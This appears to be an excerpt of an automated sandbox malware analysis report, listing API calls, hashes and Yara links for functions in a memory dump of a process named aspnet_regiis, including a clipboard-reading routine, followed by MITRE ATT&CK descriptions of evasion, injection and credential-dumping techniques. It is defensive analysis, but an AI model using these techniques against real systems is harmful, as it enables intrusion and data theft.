Instruction Fuzzy Hash: E641C8B5D10B40AFD770EF3D8A0B7167EB4AB05210F508B1DF9E68A6C4E634A4198BD7

Function 72C7A4D2 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 72C7A4F2

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 4784a34e00c9ae8c0799bf7d747ba309865315089c2cf301b85d5c50d6d1810e
Instruction ID: ad7e7cbfa7f5206de56e47475dad742c2159738261508c21921c7a0ae31113ec
Opcode Fuzzy Hash: 4784a34e00c9ae8c0799bf7d747ba309865315089c2cf301b85d5c50d6d1810e
Instruction Fuzzy Hash: 3C212771E052918FD709CA3DDC94B69BFA2BFA9304F0CC1DCC04997386CA348845CB51

Function 72C4CF53 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 72C4CF2A

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 67944168a30ec75285c9d10ffd625cfed7b55b0016a80170ad42b9cfab6677f8
Instruction ID: 9d353c8d5d1021fc7f8311d77890f0676ce18c92baa8c15c8edb39ca488dd919
Opcode Fuzzy Hash: 67944168a30ec75285c9d10ffd625cfed7b55b0016a80170ad42b9cfab6677f8
Instruction Fuzzy Hash: F7F031B59407409FD760EF39C9177567EA1A781600F11CA1DE4DA47785DA345409CBD3

Function 72C80B80 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,72C4B84E,00000000,00000001,?,00000000,?,00000000), ref: 72C80BB2

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6833710ae2a77138dc1ab40eb799c1dd7d0e7460b6533b9eec91d0b93f9ba1e9
Instruction ID: fe426293e0bf0f62aeaebbe8bfb919c2703ed4ca6950bb81a6bf2164fe203e79
Opcode Fuzzy Hash: 6833710ae2a77138dc1ab40eb799c1dd7d0e7460b6533b9eec91d0b93f9ba1e9
Instruction Fuzzy Hash: 2BE02B33414251BBD6015E2DAC05F177BA8DFE1724F024C74E80466104E735E811C1A2

Function 72C7535D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 72C753A5

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 08750fc5e330908c5db76b149593e207e3afb89c5c076591d4f81b340fca7296
Instruction ID: bd6f548c978d4775298cd9cf13b082c32ad726c02bbbf794790d34220c6fe8f4
Opcode Fuzzy Hash: 08750fc5e330908c5db76b149593e207e3afb89c5c076591d4f81b340fca7296
Instruction Fuzzy Hash: 67F067B5508702DFD714DF29C5A871ABBE1FB84344F118A1CE49A8B390D7B5A549CF82

Function 72C73F97 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 72C73FE0

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 625e2b1c78f794673fcd554790523b6f0620305f6424234dd37f42bcfe4a4cc0
Instruction ID: e24dedf95dddd0db91d4c6c0b449f4a41cc530967a8f35fb284104c16b73d170
Opcode Fuzzy Hash: 625e2b1c78f794673fcd554790523b6f0620305f6424234dd37f42bcfe4a4cc0
Instruction Fuzzy Hash: 87F028B4108701CFE350DF29C1A471ABBF5FB85344F10894CE5998B3A1D7B6A949CF82

Function 72C4CF79 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 72C4CF8B

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 1a8497ab39d82d313b382f1a8abffd138172a2664e8dd7474ac6e29428391dd2
Instruction ID: cbbc9230206cceaaf54417063b60b7a559c6bf9f26bd4c69d8ba1ff9aead5e60
Opcode Fuzzy Hash: 1a8497ab39d82d313b382f1a8abffd138172a2664e8dd7474ac6e29428391dd2
Instruction Fuzzy Hash: DED0C9753C43847BF26486099E63F2432105755F26F704B1DB323FE6C0D9D07504860C

Function 72C8183E Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 72C8184C

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 229ab3240759c00e066dcb89300e8debc20de4a067b8a4481b897ed3e997408e
Instruction ID: 6300d89dad6c58f2ca0ff596236cbb790365b0d04a81b859fb79832cfac042f5
Opcode Fuzzy Hash: 229ab3240759c00e066dcb89300e8debc20de4a067b8a4481b897ed3e997408e
Instruction Fuzzy Hash: B8E012B79812D09FC708CF66D8555743B60AB6E354324591DD242D3341DB31A902CB11

Function 72C7F1F0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,72C80BCB,?,72C4B84E,00000000,00000001,?,00000000,?,00000000), ref: 72C7F20E

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2acead75fb8c3fc1e3666a688a5980f95f88c61ec524873457e2c3ea6cef6267
Instruction ID: 2c46cb4aadfee35dd2b1dabbdb3fdeea993965a4be535134a31450f88728f3cd
Opcode Fuzzy Hash: 2acead75fb8c3fc1e3666a688a5980f95f88c61ec524873457e2c3ea6cef6267
Instruction Fuzzy Hash: B1D01232485172EFC6105F19EC19B863B98DF15371F134955A9447B064C720DC92C7D0

Function 72C7F1D0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,A2E6E197,72C48AFA,929D7C9F), ref: 72C7F1E0

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6b22008a9b5ac05859e3138201c05102d083957e7be6313ca966f21dd10e91d7
Instruction ID: fed5615e43b099200b3f3545c5adf11d9b168b2640e29d510e4a0f5718e1341c
Opcode Fuzzy Hash: 6b22008a9b5ac05859e3138201c05102d083957e7be6313ca966f21dd10e91d7
Instruction Fuzzy Hash: ACC09232086161BFDA106F19EC08FCB3FA8EF663A0F164495B948770B4C760AC93CAD5

Non-executed Functions

Function 72C76F60 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 132clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 72C76F74
GetClipboardData.USER32 ref: 72C76F8F
GlobalLock.KERNEL32 ref: 72C76FA8
GetWindowLongW.USER32 ref: 72C7700E
GlobalUnlock.KERNEL32 ref: 72C77110
CloseClipboard.USER32 ref: 72C7711B

Strings

x, xrefs: 72C77051
h, xrefs: 72C77038
e, xrefs: 72C77029
-, xrefs: 72C7704C
f, xrefs: 72C77047
k, xrefs: 72C77042
z, xrefs: 72C7705B
}, xrefs: 72C77056
Y, xrefs: 72C7703D
\, xrefs: 72C77033
m, xrefs: 72C7702E

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: -$Y$\$e$f$h$k$m$x$z$}
API String ID: 2832541153-3917866455
Opcode ID: 71fe16047f5dbde7b1c098668c7dbbc51853c782b60f3af9deb2929bedd23a03
Instruction ID: 4b390cb418489643dfbc266c5be66bf2b3411dba654251151f1339489fe81c38
Opcode Fuzzy Hash: 71fe16047f5dbde7b1c098668c7dbbc51853c782b60f3af9deb2929bedd23a03
Instruction Fuzzy Hash: 7241AD7154C3848FD301AF7DD98A31FBEE19B91204F098A2DE4D986385D67D859CC7A3

Function 72C6B730 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 90COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 72C6B83C

Strings

+$e, xrefs: 72C6B883
b`, xrefs: 72C6B792
5F&D, xrefs: 72C6B74A
n8l, xrefs: 72C6B77A
+$e, xrefs: 72C6B80C

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$5F&D$b`$n8l
API String ID: 237503144-2165861206
Opcode ID: ad3a52c5436243bd349d55187353d72da76a7b93e6d30550c3eac20307c52734
Instruction ID: a8bd3689fdb3b1c9e44a64464555e284a3f0872fb68a42878a39cad0341e26c9
Opcode Fuzzy Hash: ad3a52c5436243bd349d55187353d72da76a7b93e6d30550c3eac20307c52734
Instruction Fuzzy Hash: 9C31BAB1249350DAD320CF65D89171FBBE0EFC5308F554D2DF2A96B281C7B28506CB4A

Function 72C76558 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 72C765D2

Strings

0, xrefs: 72C7681D
PMJ, xrefs: 72C7672D
PMJ, xrefs: 72C7673E
PMJ, xrefs: 72C76734

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: 0$PMJ$PMJ$PMJ
API String ID: 2525500382-1521763145
Opcode ID: a4e6d31f35580bf465a0f0b24856e67b7c0c7537846da152d5c04b80b1995780
Instruction ID: c9742e550c91fb388f12ae7efe3219ac8d0fe2ac9c61f2c0e2791e174fb40bb6
Opcode Fuzzy Hash: a4e6d31f35580bf465a0f0b24856e67b7c0c7537846da152d5c04b80b1995780
Instruction Fuzzy Hash: E2A14A61208BC28ED326CA3C8848345BF915B67228F6887DCD1F98F3E7C3669517C766

Function 72C660B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 326COMMON

Download Yara Rule

Strings

ol, xrefs: 72C6614A
du, xrefs: 72C65F96

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: du$ol
API String ID: 0-715466222
Opcode ID: 1d83772e80c84921986ede9d056d02d37cbb6c8a6443794b7b8196895df550df
Instruction ID: acc2988b42d4b4612cd9eb2a84d47e8ecbbc51f17195f1a617ef28889f886ee2
Opcode Fuzzy Hash: 1d83772e80c84921986ede9d056d02d37cbb6c8a6443794b7b8196895df550df
Instruction Fuzzy Hash: 72B146726083409FD320CF69CC9179BBBE5EBD5314F148A2DFA99C7291D7798505CB82

Function 72C59567 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 312COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 72C59980

Strings

EwiE, xrefs: 72C595DF

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: EwiE
API String ID: 237503144-1857645623
Opcode ID: 210a572c717c5678f014c8314578b81bc8ba4a7e386e0e667ab66dddfa88c43e
Instruction ID: ca1ab8a8c26e3e23a5f9d23937e3d44a24a5a5cf9197578bb038f216cbdbb573
Opcode Fuzzy Hash: 210a572c717c5678f014c8314578b81bc8ba4a7e386e0e667ab66dddfa88c43e
Instruction Fuzzy Hash: 22C1D0755083518BD310CF19C49165BB7F2FFD8314F188A6DE8CA9B254E778DA06CB86

Function 72C65680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 72C65742

Strings

=CkQ, xrefs: 72C65764
HCkQ, xrefs: 72C657C3
PNrL, xrefs: 72C656BA
MJ, xrefs: 72C656C6

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: =CkQ$HCkQ$MJ$PNrL
API String ID: 237503144-2499749531
Opcode ID: ebc4ea8f6b475417d8c4ec977bb59780499a090d6ca89dbc0b8061107bb1aac2
Instruction ID: 613b3302653c9ed21be4ee5b46cd1cb75c98239b59c5c3130d6ff9173ac9fa64
Opcode Fuzzy Hash: ebc4ea8f6b475417d8c4ec977bb59780499a090d6ca89dbc0b8061107bb1aac2
Instruction Fuzzy Hash: BC311272A1D3108BD318CE29C85175FBBE3EFC6304F29C92CE0A55B284CA759906CB82

Function 72C77571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 72C775A1
GetSystemMetrics.USER32 ref: 72C775B0

Strings

, xrefs: 72C7765E

Memory Dump Source

Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true

Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 6b65dfe44738a6230494c72b08fdda6825040a6e629fea5bebd807e217bcc019
Instruction ID: 85f678721203e7c22f1e18ddd1d9e82b0774e3fb01539dd3ce12e5a9fb19ad19
Opcode Fuzzy Hash: 6b65dfe44738a6230494c72b08fdda6825040a6e629fea5bebd807e217bcc019
Instruction Fuzzy Hash: 2031A7B4914354DFDB00EF69C98560EBBF4BB98304F11896EE498DB350E770A988CF92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
